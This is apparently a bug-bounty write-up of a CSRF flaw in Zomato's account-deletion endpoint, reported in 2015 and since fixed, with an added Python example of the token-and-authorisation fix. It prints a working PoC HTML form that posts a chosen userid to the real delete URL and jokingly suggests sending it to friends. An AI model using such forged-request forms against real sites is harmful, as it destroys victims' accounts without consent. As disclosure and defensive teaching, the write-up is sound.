Hi, friends :D,
Zomato is an online restaurant search and discovery service providing information on home delivery, dining-out, cafés and nightlife for various cities of India and 21 other countries. It has 62.5 million registered users.
It caught my attention, so I was messing around with Zomato. While checking out the settings section I found the “Delete my account” option, and after clicking on it a prompt like this appears:
Now, to delete the account you have to type “delete” inside it and confirm. But there was a flaw: no CSRF token was present to validate the request!
What is a CSRF token?
A CSRF token is a protective measure used to prevent cross-site request forgery attacks: it lets the server check whether a request is really coming from the legitimate user or not.
Now the exploitation part
I created a quick working PoC which allows you to delete any user’s account; to delete his or her account you just need to send this code as an HTML page or as a link. 😛
```html
<form action="https://www.zomato.com/php/delete_user_profile.php" method="POST">
<input type="hidden" name="reason" value="woot woot">
<input type="hidden" name="userid" value="[User ID to whom you wanna delete]">
<input type="submit" value="Submit request">
</form>
```
Video PoC:
Save this as delete.html and send it to your friend!
It was easy to grab any user’s userid by just visiting their profile and copying the user id, which increased the severity. 😉
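To show the two fixes the write-up points at (a per-session CSRF token on the delete endpoint, and not trusting a userid supplied in the request body), here is a small added example in Python; it is not Zomato’s code and uses constructed in-memory stand-ins for the session store and user table:

```python
import hmac
import secrets

# Constructed stand-ins for a session store and a user table.
SESSIONS = {}  # session_id -> {"user_id": ..., "csrf_token": ...}
USERS = {"u1001": "alice", "u1002": "bob"}


def start_session(user_id):
    """Log a user in and bind a fresh, unguessable CSRF token to the session."""
    session_id = secrets.token_urlsafe(16)
    SESSIONS[session_id] = {"user_id": user_id,
                            "csrf_token": secrets.token_urlsafe(32)}
    return session_id


def render_delete_form(session_id):
    """Server-rendered form: the session's token travels as a hidden field."""
    token = SESSIONS[session_id]["csrf_token"]
    return ('<form action="/php/delete_user_profile.php" method="POST">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input type="hidden" name="reason" value="">'
            '<input type="submit" value="Delete"></form>')


def delete_user_profile(session_id, form):
    """Handle the POST; returns (http_status, message)."""
    session = SESSIONS.get(session_id)
    if session is None:
        return 401, "not logged in"
    # 1. Token check: a form served from another origin cannot read the
    #    victim's token, so it cannot submit a matching value. Compare in
    #    constant time so the check does not leak the token byte by byte.
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted, session["csrf_token"]):
        return 403, "csrf token missing or invalid"
    # 2. Authorisation: the account to delete is the one that owns the
    #    session, never a userid taken from the request body.
    if "userid" in form and form["userid"] != session["user_id"]:
        return 403, "cannot delete another user's account"
    USERS.pop(session["user_id"], None)
    return 200, "account deleted"
```

A request shaped like the PoC form above (reason and userid, no token) is refused with 403 even when the browser attaches the victim’s session cookie.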
Fixing timeline:
[+] July 21, 2015: Reported to the support team
[+] Bug fixed by the team.
Let #internet be #safer place 🙂